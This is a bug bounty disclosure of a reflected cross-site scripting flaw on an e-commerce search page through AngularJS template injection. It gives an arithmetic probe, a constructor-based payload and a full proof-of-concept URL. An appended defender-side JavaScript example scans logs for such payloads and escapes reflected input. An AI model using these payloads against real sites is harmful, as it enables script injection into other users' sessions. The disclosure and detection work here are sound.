Description:
I found a reflected XSS on www.bukalapak.com via AngularJS. I found it by writing {{31338-1}} in their search page and getting the result 31337. I also read the H1 report from ysx as my reference for exploiting this.
I then used the payload from ysx to exploit AngularJS: {{constructor.constructor('alert(document.domain)')()}}.
POC (How to do it):
- Log in to an account
- Insert the payload into the search field
- The XSS will fire
POC URL:
https://www.bukalapak.com/products?utf8=%E2%9C%93&source=navbar&from=omnisearch&search_source=omnisearch_organic&search%5Bkeywords%5D=%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D
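The report above shows the two stages of an AngularJS client-side template injection: an arithmetic probe ({{31338-1}} rendering as 31337) followed by a constructor-based payload. Below is an added defender-side example, not code from the original report or from Bukalapak: part 1 scans request-log lines for interpolation-shaped search input and grades it, and part 2 shows how a server can reflect user text inside an ng-app region without AngularJS compiling it. The log lines are constructed samples, and the parameter name search[keywords] is taken from the POC URL.

```javascript
// Added example (not part of the original report): defender-side handling of
// AngularJS client-side template injection in reflected search parameters.
// Part 1 scans request logs for interpolation-shaped input such as {{31338-1}}
// or {{constructor.constructor(...)}} and grades it. Part 2 shows how a server
// can reflect user text inside an ng-app region without AngularJS compiling it.

// Constructed sample request-log lines (not real traffic); the URL shape
// mirrors the search parameter named in the report.
const SAMPLE_LOG = [
  'GET /products?search%5Bkeywords%5D=laptop+gaming HTTP/1.1',
  'GET /products?search%5Bkeywords%5D=%7B%7B31338-1%7D%7D HTTP/1.1',
  'GET /products?search%5Bkeywords%5D=%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D HTTP/1.1',
  'GET /products?search%5Bkeywords%5D=cincin+%7B%7Bemas%7D%7D HTTP/1.1',
];

// Severity order used when a single value carries several {{ }} blocks.
const RANK = { suspicious: 1, probe: 2, exploit: 3 };

// Grade one {{ ... }} expression body. A bare arithmetic expression is the
// classic "does the template engine evaluate this?" probe; anything reaching
// for constructor/__proto__ or making a call is treated as exploit-grade.
function classifyExpression(expr) {
  if (/constructor|__proto__|\(/.test(expr)) return 'exploit';
  if (/^\s*\d+\s*[-+*/]\s*\d+\s*$/.test(expr)) return 'probe';
  return 'suspicious';
}

// Highest severity across all interpolation blocks in a decoded value,
// or null when the value contains none.
function classifyValue(value) {
  let worst = null;
  for (const m of value.matchAll(/\{\{([\s\S]*?)\}\}/g)) {
    const sev = classifyExpression(m[1]);
    if (!worst || RANK[sev] > RANK[worst]) worst = sev;
  }
  return worst;
}

// Pull the request target out of a "METHOD /path?query HTTP/x" log line and
// return its decoded query parameters. URLSearchParams undoes both %XX
// escapes and the '+' for space convention used by form-encoded queries.
function parseQuery(line) {
  const target = line.split(' ')[1] || '';
  return new URL(target, 'http://localhost').searchParams;
}

// Scan log lines; one finding per parameter whose value interpolates.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, index) => {
    for (const [param, value] of parseQuery(line)) {
      const severity = classifyValue(value);
      if (severity) findings.push({ line: index + 1, param, value, severity });
    }
  });
  return findings;
}

// Part 2: safe reflection. HTML-escaping alone does not stop AngularJS from
// compiling "{{...}}" inside an ng-app element, so the escaped text is also
// wrapped in ng-non-bindable, which tells AngularJS to leave that subtree
// uncompiled.
function htmlEscape(text) {
  return text.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function safeReflect(userText) {
  return `<span ng-non-bindable>${htmlEscape(userText)}</span>`;
}

// Demo run over the constructed log.
for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`line ${f.line}: [${f.severity}] ${f.param} = ${f.value}`);
}
console.log(safeReflect('{{31338-1}}'));
```

The scanner decodes the query before matching, so URL-encoded braces such as %7B%7B are caught the same way as literal ones. The arithmetic "probe" grade is worth alerting on by itself: it is the reconnaissance step the report describes, and it typically precedes the exploit-grade payload.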
Screenshot:
It was fixed 1 day after I reported it to them.
References:
- https://hackerone.com/reports/230234
- http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
Note: I got permission from Bukalapak to disclose this report.
For the Indonesian-language version, you can see my original report at: https://drive.google.com/open?id=0B3hUlq3mDkikRndrLU9TcXo3Y04xVXI1MVJocE8yNXdNWlF3
Thanks!